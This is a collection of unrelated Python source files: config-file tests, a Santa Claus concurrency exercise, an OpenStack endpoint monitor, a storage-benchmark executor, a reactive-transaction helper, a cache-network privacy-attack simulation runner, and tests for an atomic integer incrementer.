== "ccd5bb71183532bff220ba46c268991a3ff07eb358e8255a65c30a2dce0e5fbb"
)
def test_load_config_exit_on_error(self, tmpdir):
"""
Call load_config() with an invalid path. Behavior should be dependent on the exit_on_error flag.
"""
root_path: Path = tmpdir
config_file_path: Path = root_path / "config" / "config.yaml"
# When: config file path points to a directory
mkdir(config_file_path)
# When: exit_on_error is True
# Expect: load_config will exit
with pytest.raises(SystemExit):
_ = load_config(root_path=root_path, filename=config_file_path, exit_on_error=True)
# When: exit_on_error is False
# Expect: load_config will raise an exception
with pytest.raises(ValueError):
_ = load_config(root_path=root_path, filename=config_file_path, exit_on_error=False)
def test_save_config(self, root_path_populated_with_config, default_config_dict):
"""
Test modifying the config and saving it to disk. The modified value(s) should be present after
calling load_config().
"""
root_path: Path = root_path_populated_with_config
config: Dict = copy.deepcopy(default_config_dict)
# When: modifying the config
config["harvester"]["farmer_peer"]["host"] = "oldmacdonald.eie.io"
# Sanity check that we didn't modify the default config
assert config["harvester"]["farmer_peer"]["host"] != default_config_dict["harvester"]["farmer_peer"]["host"]
# When: saving the modified config
save_config(root_path=root_path, filename="config.yaml", config_data=config)
# Expect: modifications should be preserved in the config read from disk
loaded: Dict = load_config(root_path=root_path, filename="config.yaml")
assert loaded["harvester"]["farmer_peer"]["host"] == "oldmacdonald.eie.io"
def test_multiple_writers(self, root_path_populated_with_config, default_config_dict):
"""
Test whether multiple readers/writers encounter data corruption. When using non-atomic operations
to write to the config, partial/incomplete writes can cause readers to yield bad/corrupt data.
Access to config.yaml isn't currently synchronized, so the best we can currently hope for is that
the file contents are written-to as a whole.
"""
        # Artificially inflate the size of the default config. This is done to (hopefully) force
        # save_config() to require multiple writes. When save_config() used shutil.move(),
        # multiple writes were observed, leading to read failures when data was only partially written.
default_config_dict["xyz"] = "x" * 32768
root_path: Path = root_path_populated_with_config
save_config(root_path=root_path, filename="config.yaml", config_data=default_config_dict)
num_workers: int = 30
args = list(map(lambda _: (root_path, default_config_dict), range(num_workers)))
# Spin-off several processes (not threads) to read and write config data. If any
# read failures are detected, the failing process will assert.
with Pool(processes=num_workers) as pool:
res = pool.starmap_async(run_reader_and_writer_tasks, args)
res.get(timeout=10)
|
santa_claus.py
|
#!/usr/bin/python
# -*- coding: utf-8 -*-
import threading
import time
import random
prob_falla = 0.03
num_renos = 9
num_elfos = 100
elfos_atorados = 0
umbral_elfo = 3
mutex_elfos = threading.Semaphore(1)
barrera_elfo = threading.Semaphore(0)
sem_santa = threading.Semaphore(0)
renos = []
renos_en_casa = 0
mutex_ctr_renos = threading.Semaphore(1)
barrera_renos = threading.Semaphore(0)
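# Synchronization outline (descriptive note, derived from the code below): elves that hit a
# problem count themselves under mutex_elfos; the one that reaches umbral_elfo wakes Santa
# through sem_santa and releases the waiting group through barrera_elfo. Reindeer do the same
# with mutex_ctr_renos / barrera_renos, and Santa tells the two wake-ups apart by checking
# whether elfos_atorados has reached the threshold.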
def elfo(yo):
global elfos_atorados
while True:
        # Time needed to build the canonical toy
time.sleep(2.5+random.random())
if random.random() < prob_falla:
print "¡El elfo %d tuvo un problema!" % yo
mutex_elfos.acquire()
elfos_atorados += 1
if elfos_atorados == umbral_elfo:
sem_santa.release()
for i in range(umbral_elfo):
barrera_elfo.release()
mutex_elfos.release()
barrera_elfo.acquire()
print "¡Santaaaa! Al elfo %d se le rompió su trabajo" % yo
def santa():
global elfos_atorados
print "¡Hola! Soy Santa y estoy vivo."
while True:
sem_santa.acquire()
mutex_elfos.acquire()
if elfos_atorados == umbral_elfo:
print "Vamos a arreglar %d juguetes..." % umbral_elfo
elfos_atorados -= umbral_elfo
else:
print "¡Hora de repartir regalos, jo jo jo jo!"
mutex_elfos.release()
def reno(yo):
global renos_en_casa
print "¡Hola! Soy el reno número %d y me voy de vacaciones." % yo
while True:
        # We rest for 11 months and a few days
time.sleep(11 + random.random() )
        # Your vacation is over.
mutex_ctr_renos.acquire()
print "Reno %d volviendo a casa" % yo
renos_en_casa += 1
if renos_en_casa == num_renos:
print "Despertando al rebaño"
for i in range(num_renos):
barrera_renos.release()
sem_santa.release()
mutex_ctr_renos.release()
print "Esperemos al resto del grupo... (%d)" % yo
barrera_renos.acquire()
print "¡Vámonos a repartir por todo el mundo!"
threading.Thread(target=santa, args=[]).start()
for i in range(num_renos):
threading.Thread(target=reno, args=[i]).start()
for i in range(num_elfos):
threading.Thread(target=elfo,args=[i]).start()
|
server.py
|
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
#
import logging
import threading
import time
import openstack
from keystoneauth1.exceptions import ClientException
try:
from alertaclient.api import Client as alerta_client
except ImportError:
alerta_client = None
from apimon.lib import commandsocket
from apimon.lib.statsd import get_statsd
COMMANDS = ['stop', 'pause', 'resume', 'reconfig']
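# Commands accepted over the epmon command socket; run_command() below dispatches each of
# them to the matching EndpointMonitorServer method via command_map.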
class EndpointMonitor(threading.Thread):
"""A thread that checks endpoints. """
log = logging.getLogger("apimon.EndpointMonitor")
def __init__(self, config, target_cloud,
zone: str = None, alerta: dict = None) -> None:
threading.Thread.__init__(self)
        self.log.info('Starting to watch cloud %s' % target_cloud)
self.daemon = True
self.wake_event = threading.Event()
self._stopped = False
self._pause = False
self.config = config
self.alerta = alerta
self.conn = None
self.service_override = None
self.interval = int(self.config.get_default(
'epmon', 'interval', 5))
self.influx_cnf = self.config.get_default(
'metrics', 'influxdb', {}).copy()
self.zone = zone
self.statsd_extra_keys = {
'zone': self.zone
}
self.statsd = get_statsd(
self.config,
self.statsd_extra_keys)
self.target_cloud = target_cloud
self.reload()
def stop(self) -> None:
self._stopped = True
self.wake_event.set()
def pause(self) -> None:
self._pause = True
def resume(self) -> None:
self._pause = False
def reload(self) -> None:
for cl in self.config.get_default('epmon', 'clouds', []):
if isinstance(cl, dict):
if len(cl.items()) != 1:
raise RuntimeError(
'Can not parse epmon clouds configuration')
(target_cloud, vals) = list(cl.items())[0]
else:
(target_cloud, vals) = cl, {}
if target_cloud != self.target_cloud:
continue
self.service_override = vals.get('service_override')
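            # service_override (as consumed by _execute) appears to map a catalog service
            # name to an optional dict with a 'service' key (SDK proxy attribute to use)
            # and a 'urls' list of paths to probe; an empty value disables checks for
            # that service.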
try:
self.interval = int(vals.get('interval', 5))
except Exception:
self.interval = 5
self.log.debug('Need to monitor cloud %s' % target_cloud)
auth_part = None
for cnf in self.config.config.get('clouds', []):
if cnf.get('name') == self.target_cloud:
auth_part = cnf.get('data')
if self.influx_cnf and 'additional_metric_tags' in auth_part:
self.influx_cnf['additional_metric_tags'] = \
auth_part['additional_metric_tags']
if not auth_part:
raise RuntimeError('Requested cloud %s is not found' %
target_cloud)
override_measurement = self.config.get_default('epmon', 'measurement')
if override_measurement and self.influx_cnf:
self.influx_cnf['measurement'] = override_measurement
self.region = openstack.config.get_cloud_region(
load_yaml_config=False,
**auth_part)
if self.influx_cnf:
self.region._influxdb_config = self.influx_cnf
statsd_config = self.config.get_default('metrics', 'statsd')
if statsd_config:
# Inject statsd reporter
self.region._statsd_host = statsd_config.get('host', 'localhost')
self.region._statsd_port = int(statsd_config.get('port', 8125))
self.region._statsd_prefix = (
'openstack.api.{environment}.{zone}'
.format(
environment=self.target_cloud,
zone=self.zone)
)
self._connect()
def run(self) -> None:
self._connect()
while True:
if self._stopped:
return
if not self.conn:
                # Not sure whether it works if we lose the connection
self._connect()
try:
                if self._pause:
                    # Skip the heartbeat as well while paused, so that a
                    # forgotten resume gets noticed; sleep to avoid busy-waiting.
                    time.sleep(self.interval)
                    continue
if self.conn:
self._execute()
if self.alerta:
try:
self.alerta.heartbeat(
origin='apimon.epmon.%s.%s' % (
self.zone, self.target_cloud),
tags=['apimon', 'epmon'],
attributes={
'zone': self.zone,
'cloud': self.target_cloud,
'service': ['apimon', 'epmon'],
}
)
except Exception:
self.log.exception('Error sending heartbeat')
time.sleep(self.interval)
except Exception:
self.log.exception("Exception checking endpoints:")
def _connect(self):
try:
self.conn = openstack.connection.Connection(
config=self.region,
)
except AttributeError as e:
# NOTE(gtema): SDK chains attribute error when calling
# conn.authorize, but response is not present
self.log.error('Cannot establish connection: %s' % e.__context__)
self.send_alert('identity', e.__context__)
except Exception as ex:
self.log.exception('Cannot establish connection to cloud %s: %s' %
(self.target_cloud, ex))
self.send_alert('identity', 'ConnectionException', str(ex))
def _execute(self):
eps = self.conn.config.get_service_catalog().get_endpoints().items()
for service, data in eps:
endpoint = data[0]['url']
self.log.debug('Checking service %s' % service)
srv = None
sdk_srv = None
try:
srv = self.service_override.get(service)
if not srv and service in self.service_override:
                    # An empty value for a key present in the overrides means we
                    # may want to disable checks for that service
srv = {}
sdk_srv = srv.get('service', service)
client = getattr(self.conn, sdk_srv)
except (KeyError, AttributeError):
client = self.conn.config.get_session_client(service)
if srv is not None:
urls = srv.get('urls', [])
if urls:
for url in urls:
if isinstance(url, str):
self._query_endpoint(client, service,
endpoint, url)
else:
                            self.log.error(
                                'Wrong configuration: service_override urls '
                                'must be a list of strings')
else:
self.log.debug('Skipping querying service %s' % service)
else:
self._query_endpoint(client, service, endpoint, endpoint)
def _query_endpoint(self, client, service, endpoint, url):
response = None
error = None
try:
response = client.get(
url,
headers={'content-type': 'application/json'},
timeout=5)
except (openstack.exceptions.SDKException, ClientException) as ex:
error = ex
self.log.error('Got exception for endpoint %s: %s' % (url,
ex))
except Exception:
            self.log.exception(
                'Got uncaught exception doing request to %s' % url)
status_code = -1
if response is not None:
status_code = int(response.status_code)
if error or status_code >= 500:
if endpoint != url:
query_url = openstack.utils.urljoin(endpoint, url)
else:
query_url = url
result = status_code if status_code != -1 else 'Timeout(5)'
value = (
'curl -g -i -X GET %s -H '
'"X-Auth-Token: ${TOKEN}" '
'-H "content-type: application/json" fails (%s)' % (
query_url, result)
)
self.send_alert(
resource=service,
value=value,
raw_data=str(error.message if error else response)
)
def send_alert(self, resource: str, value: str,
raw_data: str=None) -> None:
if self.alerta:
self.alerta.send_alert(
severity='critical',
environment=self.target_cloud,
service=['apimon', 'endpoint_monitor'],
origin='apimon.epmon.%s.%s' % (
self.zone, self.target_cloud),
resource=resource,
event='Failure',
value=value,
raw_data=raw_data
)
else:
self.log.error('Got error from the endpoint check, but '
'cannot report it to alerta')
class EndpointMonitorServer:
log = logging.getLogger('apimon.EndpointMonitorServer')
def __init__(self, config, zone: str = None):
        self.log.info('Starting EndpointMonitor service')
self.config = config
self._running = False
self.run_lock = threading.Lock()
self.command_map = dict(
stop=self.stop,
pause=self.pause,
resume=self.resume,
reconfig=self.reconfig
)
command_socket = self.config.get_default(
'epmon', 'socket',
'/var/lib/apimon/epmon.socket')
self.command_socket = commandsocket.CommandSocket(command_socket)
self._command_running = False
self._monitors = {}
self.alerta = None
self.zone = zone or self.config.get_default(
'epmon', 'zone', 'default_zone')
# self.accepting_work = False
def _connect_alerta(self) -> None:
if alerta_client:
alerta_ep = self.config.get_default('alerta', 'endpoint')
alerta_token = self.config.get_default('alerta', 'token')
if alerta_ep and alerta_token:
self.alerta = alerta_client(
endpoint=alerta_ep,
key=alerta_token)
def start(self):
self._running = True
self._command_running = True
self.log.debug("Starting command processor")
self.command_socket.start()
self.command_thread = threading.Thread(
target=self.run_command, name='command')
self.command_thread.daemon = True
self.command_thread.start()
self._connect_alerta()
for cl in self.config.get_default('epmon', 'clouds', []):
if isinstance(cl, dict):
if len(cl.items()) != 1:
raise RuntimeError(
'Can not parse epmon clouds configuration')
target_cloud = list(cl.keys())[0]
else:
target_cloud = cl
self.log.debug('Need to monitor cloud %s' % target_cloud)
self._monitors[target_cloud] = EndpointMonitor(
self.config, target_cloud=target_cloud,
zone=self.zone, alerta=self.alerta)
self._monitors[target_cloud].start()
def stop(self):
self.log.debug("Stopping")
with self.run_lock:
self._running = False
self._command_running = False
monitors = list(self._monitors.values())
self.command_socket.stop()
for mon in monitors:
try:
mon.stop()
mon.join()
except Exception:
self.log.exception("Exception stoping monitoring thread")
self.log.info("Stopped")
def join(self):
pass
def pause(self):
self.log.debug('Pausing')
with self.run_lock:
monitors = list(self._monitors.values())
for mon in monitors:
mon.pause()
def reconfig(self, config=None) -> None:
self.log.debug('Reconfiguration')
if not config:
self.config.read()
with self.run_lock:
monitors = list(self._monitors.values())
for mon in monitors:
mon.reload()
def resume(self):
self.log.debug('Resuming')
with self.run_lock:
monitors = list(self._monitors.values())
for mon in monitors:
mon.resume()
def run_command(self):
while self._command_running:
try:
command = self.command_socket.get().decode('utf8')
if command != '_stop':
self.command_map[command]()
except Exception:
self.log.exception("Exception while processing command")
|
test_executor.py
|
##############################################################################
# Copyright (c) 2016 EMC and others.
#
# All rights reserved. This program and the accompanying materials
# are made available under the terms of the Apache License, Version 2.0
# which accompanies this distribution, and is available at
# http://www.apache.org/licenses/LICENSE-2.0
##############################################################################
import copy
import imp
import json
import logging
from os import listdir
import os
from os.path import isfile, join
import sched
from threading import Thread
from time import sleep
import time
from storperf.carbon.converter import Converter
from storperf.carbon.emitter import CarbonMetricTransmitter
from storperf.db.job_db import JobDB
from storperf.fio.fio_invoker import FIOInvoker
from storperf.utilities.data_handler import DataHandler
from storperf.utilities.thread_gate import ThreadGate
class UnknownWorkload(Exception):
pass
class TestExecutor(object):
def __init__(self):
self.logger = logging.getLogger(__name__)
self.workload_modules = []
self.filename = None
self.deadline = None
self.steady_state_samples = 10
self.start_time = None
self.end_time = None
self.current_workload = None
self.workload_status = {}
self.result_url = None
self._queue_depths = [1, 4, 8]
self._block_sizes = [512, 4096, 16384]
self.event_listeners = set()
self.metrics_converter = Converter()
self.metrics_emitter = CarbonMetricTransmitter()
self.prefix = None
self.job_db = JobDB()
self._slaves = []
self._terminated = False
self._workload_executors = []
self._workload_thread = None
self._thread_gate = None
self._setup_metadata({})
def _setup_metadata(self, metadata={}):
try:
installer = os.environ['INSTALLER_TYPE']
except KeyError:
self.logger.error("Cannot determine installer")
installer = "Unknown_installer"
self.metadata = {}
self.metadata['project_name'] = 'storperf'
self.metadata['installer'] = installer
self.metadata['pod_name'] = 'Unknown'
self.metadata['version'] = 'Unknown'
self.metadata['scenario'] = 'Unknown'
self.metadata['build_tag'] = 'Unknown'
self.metadata['test_case'] = 'Unknown'
self.metadata['details'] = {}
self.metadata['details']['metrics'] = {}
self.metadata.update(metadata)
self.metadata['case_name'] = self.metadata['test_case']
@property
def slaves(self):
return self._slaves
@slaves.setter
def slaves(self, slaves):
self.logger.debug("Set slaves to: " + str(slaves))
self._slaves = slaves
@property
def queue_depths(self):
        return ','.join(map(str, self._queue_depths))
@queue_depths.setter
def queue_depths(self, queue_depths):
self.logger.debug("Set queue_depths to: " + str(queue_depths))
self._queue_depths = queue_depths.split(',')
@property
def block_sizes(self):
        return ','.join(map(str, self._block_sizes))
@property
def terminated(self):
return self._terminated
@block_sizes.setter
def block_sizes(self, block_sizes):
self.logger.debug("Set block_sizes to: " + str(block_sizes))
self._block_sizes = block_sizes.split(',')
def register(self, event_listener):
self.event_listeners.add(event_listener)
def unregister(self, event_listener):
self.event_listeners.discard(event_listener)
def event(self, callback_id, metric):
carbon_metrics = self.metrics_converter.convert_json_to_flat(
metric,
callback_id)
self.metrics_emitter.transmit_metrics(carbon_metrics, callback_id)
commit_count = 10
while (commit_count > 0 and
not self.metrics_emitter.confirm_commit(callback_id)):
self.logger.info("Waiting 1 more second for commit")
sleep(1)
commit_count -= 1
if self._thread_gate.report(callback_id):
self.broadcast_event()
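    # Note: the ThreadGate above is sized to the number of slaves; report() is expected to
    # return True once every slave's callback_id has reported within the configured
    # status interval, and only then is the aggregated metrics event broadcast.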
def broadcast_event(self):
for event_listener in self.event_listeners:
try:
self.logger.debug("Notifying event listener %s",
event_listener)
event_listener(self)
except Exception, e:
self.logger.exception("While notifying listener %s", e)
def register_workloads(self, workloads):
self.workload_modules = []
if (workloads is None or len(workloads) == 0):
workload_dir = os.path.normpath(
os.path.join(os.path.dirname(__file__), "workloads"))
workload_files = [
f for f in listdir(workload_dir)
if isfile(join(workload_dir, f))]
workloads = []
for filename in workload_files:
mname, _ = os.path.splitext(filename)
if (not mname.startswith('_')):
workloads.append(mname)
else:
workloads = workloads.split(',')
for workload in workloads:
try:
workload_module = self.load_from_file("workloads/" +
workload + ".py")
self.logger.debug("Found: " + str(workload_module))
if(workload_module is None):
raise UnknownWorkload(
"ERROR: Unknown workload: " + workload)
if workload_module not in self.workload_modules:
self.workload_modules.append(workload_module)
except ImportError, err:
raise UnknownWorkload("ERROR: " + str(err))
def load_from_file(self, uri):
uri = os.path.normpath(os.path.join(os.path.dirname(__file__), uri))
path, fname = os.path.split(uri)
mname, _ = os.path.splitext(fname)
no_ext = os.path.join(path, mname)
self.logger.debug("Looking for: " + no_ext)
if os.path.exists(no_ext + '.pyc'):
self.logger.debug("Loading compiled: " + mname + " from " + no_ext)
return imp.load_compiled(mname, no_ext + '.pyc')
if os.path.exists(no_ext + '.py'):
self.logger.debug("Compiling: " + mname + " from " + no_ext)
return imp.load_source(mname, no_ext + '.py')
return None
def execute(self, metadata):
self.job_db.create_job_id()
self.job_db.record_workload_params(metadata)
self._setup_metadata(metadata)
self._workload_thread = Thread(target=self.execute_workloads,
args=(),
name="Workload thread")
self._workload_thread.start()
return self.job_db.job_id
def terminate(self):
self._terminated = True
self.end_time = time.time()
return self.terminate_current_run()
def terminate_current_run(self):
self.logger.info("Terminating current run")
terminated_hosts = []
for workload in self._workload_executors:
workload.terminate()
terminated_hosts.append(workload.remote_host)
return terminated_hosts
def execution_status(self, job_id):
result = {}
status = "Completed"
if self.job_db.job_id == job_id and self._terminated is False:
status = "Running"
result['Status'] = status
result['Workloads'] = self.workload_status
result['TestResultURL'] = self.result_url
else:
jobs = self.job_db.fetch_jobs()
self.logger.info("Jobs")
self.logger.info(jobs)
for job in jobs:
if self.job_db.job_id == job_id and self._terminated is False:
status = "Running"
result['Status'] = status
result['Workloads'] = self.workload_status
result['TestResultURL'] = self.result_url
else:
result[job] = {}
result[job]['Status'] = "Completed"
return result
def execute_workloads(self):
self._terminated = False
self.logger.info("Starting job %s" % (self.job_db.job_id))
self.event_listeners.clear()
data_handler = DataHandler()
self.register(data_handler.data_event)
self.start_time = time.time()
self.workload_status = {}
workloads = self._create_workload_matrix()
for current_workload in workloads:
workload = current_workload['workload']
self._thread_gate = ThreadGate(len(self.slaves),
workload.options['status-interval'])
if self._terminated:
return
self.current_workload = current_workload['name']
self.logger.info("Starting run %s" % self.current_workload)
self.workload_status[self.current_workload] = "Running"
scheduler = sched.scheduler(time.time, time.sleep)
if self.deadline is not None \
and not current_workload['workload_name'].startswith("_"):
event = scheduler.enter(self.deadline * 60, 1,
self.terminate_current_run,
())
t = Thread(target=scheduler.run, args=())
t.start()
workload.options['iodepth'] = str(current_workload['queue-depth'])
workload.options['bs'] = str(current_workload['blocksize'])
slave_threads = []
for slave in self.slaves:
slave_workload = copy.copy(current_workload['workload'])
slave_workload.remote_host = slave
self._workload_executors.append(slave_workload)
t = Thread(target=self.execute_on_node,
args=(slave_workload,),
name="%s worker" % slave)
t.daemon = False
t.start()
slave_threads.append(t)
for slave_thread in slave_threads:
self.logger.debug("Waiting on %s" % slave_thread)
slave_thread.join()
self.logger.debug("Done waiting for %s" % slave_thread)
if not scheduler.empty():
try:
scheduler.cancel(event)
except ValueError:
pass
self.logger.info("Completed run %s"
% self.current_workload)
self.workload_status[self.current_workload] = "Completed"
self._workload_executors = []
self.current_workload = None
self.logger.info("Completed job %s" % (self.job_db.job_id))
self.end_time = time.time()
self._terminated = True
self.broadcast_event()
self.unregister(data_handler.data_event)
report = {'report': json.dumps(self.metadata)}
self.job_db.record_workload_params(report)
self.job_db.job_id = None
if self.result_url is not None:
self.logger.info("Results can be found at %s" % self.result_url)
def _create_workload_matrix(self):
workloads = []
for workload_module in self.workload_modules:
workload_name = getattr(workload_module, "__name__")
constructorMethod = getattr(workload_module, workload_name)
workload = constructorMethod()
if (self.filename is not None):
workload.filename = self.filename
workload.id = self.job_db.job_id
if (workload_name.startswith("_")):
iodepths = [8, ]
blocksizes = [16384, ]
else:
iodepths = self._queue_depths
blocksizes = self._block_sizes
for blocksize in blocksizes:
for iodepth in iodepths:
name = '%s.%s.queue-depth.%s.block-size.%s' % \
(self.job_db.job_id, workload_name, iodepth, blocksize)
self.workload_status[name] = "Pending"
parameters = {'queue-depth': iodepth,
'blocksize': blocksize,
'name': name,
'workload_name': workload_name,
'status': 'Pending',
'workload': workload}
self.logger.info("Workload %s=%s" % (name, parameters))
workloads.append(parameters)
return workloads
def execute_on_node(self, workload):
invoker = FIOInvoker(self.metadata)
invoker.register(self.event)
workload.invoker = invoker
self.logger.info("Starting " + workload.fullname)
self.job_db.start_workload(workload)
workload.execute()
self.job_db.end_workload(workload)
invoker.unregister(self.event)
self.logger.info("Ended " + workload.fullname)
|
ReactiveManager.py
|
import threading
import time
import sys
sys.path.append("../../build/bindings/python")
from libpydiamond import *
from twisted.internet import reactor
NO_NOTIFICATION = 18446744073709551615L
funcArgMap = dict() # function <-> arguments map
idFuncMap = dict() # reactive_id <-> function map
funcIdMap = dict() # function <-> reactive_id map
nextId = 0
cv = threading.Condition()
def runInBackground(target, *args, **kwargs):
threading.Thread(target=target, args=args, kwargs=kwargs).start()
#reactor.callInThread(target, *args, **kwargs)
def start():
NotificationInit(callback)
thread = threading.Thread(target=run, args=())
thread.daemon = True
thread.start()
def callback():
cv.acquire()
cv.notify()
cv.release()
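# run() blocks on the condition variable until callback() (registered via NotificationInit)
# signals that a notification may be pending, then drains every pending reactive id,
# re-running its registered function inside a reactive transaction until
# GetNextNotification() returns the NO_NOTIFICATION sentinel.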
def run():
while True:
cv.acquire()
cv.wait()
cv.release()
reactive_id = DObject.GetNextNotification(False)
while reactive_id != NO_NOTIFICATION:
func = idFuncMap[reactive_id]
DObject.BeginReactive(reactive_id)
func(*funcArgMap[func])
DObject.TransactionCommit()
reactive_id = DObject.GetNextNotification(False)
def reactive_txn(func, *args):
reactive_id = generateId()
idFuncMap[reactive_id] = func
funcIdMap[func] = reactive_id
funcArgMap[func] = args
runInBackground(reactive_txn_helper, reactive_id, func, *args)
def reactive_txn_helper(reactive_id, func, *args):
DObject.BeginReactive(reactive_id)
func(*args)
DObject.TransactionCommit()
def reactive_stop(func):
reactive_id = funcIdMap[func]
del idFuncMap[reactive_id]
del funcIdMap[func]
del funcArgMap[func]
runInBackground(reactive_stop_helper, reactive_id)
def reactive_stop_helper(reactive_id):
DObject.Deregister(reactive_id)
def txn_execute(func, *args):
runInBackground(txn_execute_helper, func, *args)
def txn_execute_helper(func, *args):
DObject.TransactionBegin()
func(*args)
DObject.TransactionCommit()
cv.acquire()
cv.notify()
cv.release()
def generateId():
global nextId
ret = nextId
nextId = nextId + 1
return ret
|
runner.py
|
import sys
import random
from multiprocessing import Process
from cache import *
from network import *
# The number of times each experiment is run
runs = 10
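# run_simulation: for each of `runs` repetitions, issue T requests from randomly chosen
# consumers, serve each request from the first (randomly ordered) cache holding the sampled
# identity, then run freq_attack() on the merged observers' histogram against the auxiliary
# distribution and collect the per-run result.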
def run_simulation(T, net, prefixes, caches, auxiliary_distribution, request_distribution):
global runs
results = []
cache_indexes = range(len(caches))
num_consumers = len(net.get_consumers())
for r in range(runs):
for t in range(T):
consumer_index = random_range(0, num_consumers - 1)
consumer = net.get_consumers()[consumer_index]
identity, index = request_distribution.sample()
# This should select a random packet from the request
# distribution, and then a random prefix from the set of prefixes
# prefix_index = random_range(0, len(prefixes) - 1)
# packet = Packet(prefixes[prefix_index], packet.identity)
random.shuffle(cache_indexes)
for i in cache_indexes:
cache = caches[i]
if cache.lookup(identity):
new_packet = Packet(cache.prefix, identity)
consumer.process_packet(new_packet)
break
# Collect the observed results, generate the histograms, and then run the attack
observer = net.merge_observers()
aux_hist = auxiliary_distribution.histogram(T)
observed_hist = observer.histogram(request_distribution.domain())
# print aux_hist
# print observed_hist
result = freq_attack(observed_hist, aux_hist, request_distribution, T)
results.append(result)
return results
def create_network(net_functor, distributed_caches, adv_p, cache_p, num_consumers = 10):
net = net_functor(distributed_caches, adv_p, cache_p, 0.0, num_consumers)
for producer in net.get_producers():
# print >> sys.stderr, "Propagating %s from %s" % (producer.get_prefix(), producer.name)
net.propogate_route(producer, producer.get_prefix())
# net.to_dot(data_prefix(params_to_id(T, N, S, P)) + ".dot")
# net.to_dot("net_%f_%f_%d.dot" % (adv_p, cache_p, num_consumers))
return net
def create_content_split(prefixes, N, S):
content_universe = Cache(prefixes[0])
content_universe.populate(N, S)
if len(prefixes) > 1:
distributed_caches = content_universe.split(prefixes)
else:
distributed_caches = [content_universe]
return distributed_caches, content_universe
def create_content_replicate(prefixes, N, S):
content_universe = Cache(prefixes[0])
content_universe.populate(N, S)
if len(prefixes) > 1:
distributed_caches = content_universe.replicate(prefixes)
else:
distributed_caches = [content_universe]
return distributed_caches, content_universe
def create_prefixes(P):
prefixes = []
for i in range(P):
prefixes.append("prefix-%d" % i)
return prefixes
def simulate(T, N, S, P, C, content_func, net_func, request_func, aux_func, adv_p, cache_p, output):
prefixes = create_prefixes(P)
distributed_caches, universe = content_func(prefixes, N, S)
net = create_network(net_func, distributed_caches, adv_p, cache_p, C)
aux_dist = aux_func(universe)
request_dist = request_func(universe)
results = run_simulation(T, net, prefixes, distributed_caches, aux_dist, request_dist)
distance = kolmogorov_smirnov(request_dist, aux_dist)
mp = compute_average_match_percent(results)
cdf = compute_average_cdf(results)
with open(output, "w") as fh:
fh.write(str(distance))
fh.write("\n")
fh.write(str(mp))
fh.write("\n")
fh.write(str(cdf))
fh.write("\n")
return distance, mp, cdf
def create_simulation(T, N, S, P, net_func, request_func, aux_func, adv_p, cache_p, output, C = 10):
p = Process(target=simulate, args=(T, N, S, P, C, create_content_split, net_func, request_func, aux_func, adv_p, cache_p, output))
return p
def start_simulation(T, N, S, P, net_func, request_func, aux_func, adv_p, cache_p, output, C = 10):
p = Process(target=simulate, args=(T, N, S, P, C, create_content_split, net_func, request_func, aux_func, adv_p, cache_p, output))
p.start()
return p
def create_split_simulation(T, N, S, P, net_func, request_func, aux_func, adv_p, cache_p, output, C = 10):
p = Process(target=simulate, args=(T, N, S, P, C, create_content_split, net_func, request_func, aux_func, adv_p, cache_p, output))
return p
def start_split_simulation(T, N, S, P, net_func, request_func, aux_func, adv_p, cache_p, output, C = 10):
    p = create_split_simulation(T, N, S, P, net_func, request_func, aux_func, adv_p, cache_p, output, C)
p.start()
return p
def create_replicate_simulation(T, N, S, P, net_func, request_func, aux_func, adv_p, cache_p, output, C = 10):
p = Process(target=simulate, args=(T, N, S, P, C, create_content_replicate, net_func, request_func, aux_func, adv_p, cache_p, output))
return p
def start_replicate_simulation(T, N, S, P, net_func, request_func, aux_func, adv_p, cache_p, output, C = 10):
    p = create_replicate_simulation(T, N, S, P, net_func, request_func, aux_func, adv_p, cache_p, output, C)
p.start()
return p
|
test_integer_incrementer.py
|
import threading
from typing import List, Set
from json import dumps as jsondumps
import pytest
import gevent
from gevent.greenlet import Greenlet
from grizzly.testdata.variables.integer_incrementer import atomicintegerincrementer__base_type__
from grizzly.testdata.variables import AtomicIntegerIncrementer
from ....fixtures import AtomicVariableCleanupFixture
def test_atomicintegerincrementer__base_type__() -> None:
assert atomicintegerincrementer__base_type__(10) == '10'
assert atomicintegerincrementer__base_type__('10') == '10'
assert atomicintegerincrementer__base_type__('10 | step=2') == '10 | step=2'
assert atomicintegerincrementer__base_type__('10|step=35') == '10 | step=35'
assert atomicintegerincrementer__base_type__('1| step=20') == '1 | step=20'
with pytest.raises(ValueError):
atomicintegerincrementer__base_type__('10 |')
with pytest.raises(ValueError):
atomicintegerincrementer__base_type__('10 | asdf')
with pytest.raises(ValueError):
atomicintegerincrementer__base_type__('|')
with pytest.raises(ValueError):
atomicintegerincrementer__base_type__('asdf|')
with pytest.raises(ValueError):
atomicintegerincrementer__base_type__('asdf| step=asdf')
with pytest.raises(ValueError):
atomicintegerincrementer__base_type__('10 | step=asdf')
with pytest.raises(ValueError) as ve:
atomicintegerincrementer__base_type__('10 | step=1, iterations=10')
    assert 'argument iterations is not allowed' in str(ve)
with pytest.raises(ValueError) as ve:
atomicintegerincrementer__base_type__('10 | iterations=10')
assert 'step is not specified' in str(ve)
with pytest.raises(ValueError) as ve:
atomicintegerincrementer__base_type__('asdf')
assert 'is not a valid initial value' in str(ve)
class TestAtomicIntegerIncrementer:
def test_increments_on_access(self, cleanup: AtomicVariableCleanupFixture) -> None:
try:
t = AtomicIntegerIncrementer('message_id', 1)
assert t['message_id'] == 1
assert t['message_id'] == 2
t = AtomicIntegerIncrementer('test', '0 | step=10')
assert len(t._steps.keys()) == 2
assert 'message_id' in t._steps
assert 'test' in t._steps
assert t['test'] == 0
assert t['test'] == 10
assert t['test'] == 20
finally:
cleanup()
    def test_clear_and_destroy(self, cleanup: AtomicVariableCleanupFixture) -> None:
try:
try:
AtomicIntegerIncrementer.destroy()
except Exception:
pass
with pytest.raises(ValueError):
AtomicIntegerIncrementer.destroy()
with pytest.raises(ValueError):
AtomicIntegerIncrementer.clear()
instance = AtomicIntegerIncrementer('dummy', '1|step=10')
assert len(instance._values.keys()) == 1
assert len(instance._steps.keys()) == 1
AtomicIntegerIncrementer.clear()
assert len(instance._values.keys()) == 0
assert len(instance._steps.keys()) == 0
AtomicIntegerIncrementer.destroy()
with pytest.raises(ValueError):
AtomicIntegerIncrementer.destroy()
finally:
cleanup()
